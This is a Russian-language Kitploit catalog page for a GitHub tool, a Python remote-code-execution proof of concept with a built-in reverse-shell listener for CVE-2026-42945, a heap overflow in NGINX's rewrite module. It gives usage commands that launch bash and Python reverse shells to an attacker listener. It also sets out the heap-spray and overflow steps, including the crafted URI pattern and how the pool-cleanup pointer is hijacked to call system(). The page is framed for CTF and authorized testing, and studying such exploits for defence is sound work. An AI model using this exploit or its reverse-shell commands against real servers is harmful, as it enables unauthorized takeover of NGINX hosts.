Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-42945-Reverse-Shell-POC — Python RCE PoC с reverse-shell слушателем для CVE-2026-42945 (NGINX Rift) | Kitploit
Инструменты/GitHubGitHub/sec-sys/cve-2026-42945-reverse-shell-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеRed TeamingИнструмент Удаленного ДоступаЭксплуатация Бинарных Файлов
GitHubsec-sys/cve-2026-42945-reverse-shell-poc

CVE-2026-42945-Reverse-Shell-POC

Python RCE PoC с reverse-shell слушателем для CVE-2026-42945 (NGINX Rift)

Репозиторий
163 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-42945 (NGINX Rift) RCE PoC с обратной оболочкой

Концептуальный эксплоит (PoC) удаленного выполнения кода для CVE-2026-42945, переполнение буфера в куче в модуле ngx_http_rewrite_module NGINX. Этот форк дополняет публичный PoC-триггер встроенным слушателем обратной оболочки и настраиваемыми параметрами эксплуатации для CTF и изолированных лабораторных сред.


Сводка об уязвимости

  • CVE ID: CVE-2026-42945
  • Alias: NGINX Rift
  • Затронутый компонент: ngx_http_rewrite_module
  • Затронутые версии: NGINX Open Source 0.6.27 – 1.30.0; NGINX Plus R32 – R36
  • Исправленные версии: NGINX Open Source 1.30.1 / 1.31.0; NGINX Plus R36 P4, R35 P2, R32 P6
  • Основная причина: Несоответствие двухпроходного механизма скриптов. При проходе вычисления длины используется новый поддвижок с is_args = 0, а при проходе копирования — основной движок с is_args = 1, вызывая ngx_escape_uri(..., NGX_ESCAPE_ARGS). Экранируемые байты расширяются до 3 байт каждый, переполняя недоразмерный буфер в куче управляемыми данными URI.
  • Предпосылки для RCE: Уязвимая конфигурация rewrite/set с использованием безымянных захватов PCRE ($1, $2) плюс ? в строке замены; отключенный ASLR или известные базовые адреса кучи/libc; возможность выделять кучу через тела POST-запросов.

Файлы

ФайлОписание
cve_2026_42945_rce_poc.pyЭксплоит на Python со встроенным слушателем обратной оболочки и режимами выполнения команд.

Требования

  • Python 3.8+
  • Целевой экземпляр NGINX, соответствующий уязвимой версии и профилю конфигурации.
  • Сетевая доступность до HTTP-порта цели.
  • Для обратной оболочки: хост атакующего должен быть доступен с цели на выбранном порту слушателя.

Использование

Выполнение одной команды

python3 cve_2026_42945_rce_poc.py \
  --host 10.0.0.5 \
  --port 80 \
  --cmd "id > /tmp/pwned"

Запуск обратной оболочки (по умолчанию bash)

python3 cve_2026_42945_rce_poc.py \
  --host 10.0.0.5 \
  --port 80 \
  --shell \
  --listen-ip 10.0.0.1 \
  --listen-port 1337

Полезная нагрузка обратной оболочки на Python

python3 cve_2026_42945_rce_poc.py \
  --host 10.0.0.5 \
  --port 80 \
  --shell \
  --shell-type python \
  --listen-ip 10.0.0.1 \
  --listen-port 1337

Калибровка адресов для конкретной цели

python3 cve_2026_42945_rce_poc.py \
  --host 10.0.0.5 \
  --port 80 \
  --shell \
  --listen-ip 10.0.0.1 \
  --listen-port 1337 \
  --heap-base 0x555555659000 \
  --libc-base 0x7ffff77ba000 \
  --system-offset 0x50d70

Принцип работы

  1. Распыление кучи: Отправка нескольких POST-запросов с телами, содержащими поддельную структуру ngx_pool_cleanup_s: system@libc | указатель на команду | null. Эти тела занимают стабильные области кучи.
  2. Инициация переполнения: Отправка специально сформированного GET-запроса на уязвимую конечную точку rewrite. Шаблон URI:
    /api/<349 x 'A'><969 x '+'><6-байтовый адрес кучи>
    
    Переполнение повреждает указатель cleanup соседнего ngx_pool_t.
  3. Выполнение кода: Когда пул уничтожается, поврежденный указатель cleanup вызывает system(command), выполняя управляемую атакующим команду в рабочем процессе NGINX.
  4. Обратная оболочка: Если используется --shell, команда представляет собой полезную нагрузку обратной оболочки, а встроенный слушатель перехватывает входящее соединение.

Предупреждение безопасности

Этот инструмент предназначен для:

  • Упражнения CTF и лабораторные работы.
  • Авторизованное тестирование на проникновение с письменного разрешения.
  • Исследования в области безопасности и мероприятия по усилению защиты.

Не используйте на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.


Лицензия

Используйте на свой страх и риск. Автор не несет ответственности за несанкционированное или незаконное использование.


Атрибуция

Оригинальное исследование уязвимости и PoC от depthfirstdisclosures (https://github.com/depthfirstdisclosures/nginx-rift). Этот форк с обратной оболочкой на Python создан для использования в лабораториях red team / CTF.


Ссылки

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-42945
  • Консультации по безопасности NGINX: https://nginx.org/en/security_advisories.html
  • База знаний F5 / NGINX: https://my.f5.com/manage/s/article/K000161019
  • Оригинальный репозиторий исследований: https://github.com/depthfirstdisclosures/nginx-rift
Скачать инструмент